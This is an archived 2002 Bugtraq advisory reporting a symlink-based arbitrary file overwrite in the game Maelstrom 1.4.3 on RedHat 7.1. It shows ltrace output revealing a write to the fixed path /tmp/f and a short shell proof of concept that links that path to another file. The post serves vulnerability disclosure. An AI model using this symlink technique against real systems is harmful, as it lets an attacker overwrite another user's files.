[23908] in bugtraq
Maelstrom 1.4.3 abartity file overwrite
daemon@ATHENA.MIT.EDU (Andrew Griffiths)
Sun Jan 20 17:14:34 2002
Date: Sun, 20 Jan 2002 20:16:30 +1100 (EST)
Message-Id: <200201200916.g0K9GUT13172@franklin.nt.tas.gov.au>
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-type: text/plain; charset=us-ascii
Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1
When trying to break stuff, ltracing Maelstrom showed the following:
fopen("/tmp/f", "w") = 0x08081f58
fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
fclose(0x08081f58) = 0
Which made we wonder if it followed symbolic links, by doing
[andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \
ln -s /tmp/bla f)
at which point I ran it again, and when I did cat /tmp/bla, I got
Main program = Maelstrom
Conclusion:
-=-=-=-=-=-
You can overwrite arbitrary files with the permissions of the user who ran
it.
Of course, this won't work on systems that have linking restrictions in /tmp.
Fixing it
-=-=-=-=-
Remove the code that does the above.
--
www.tasmail.com
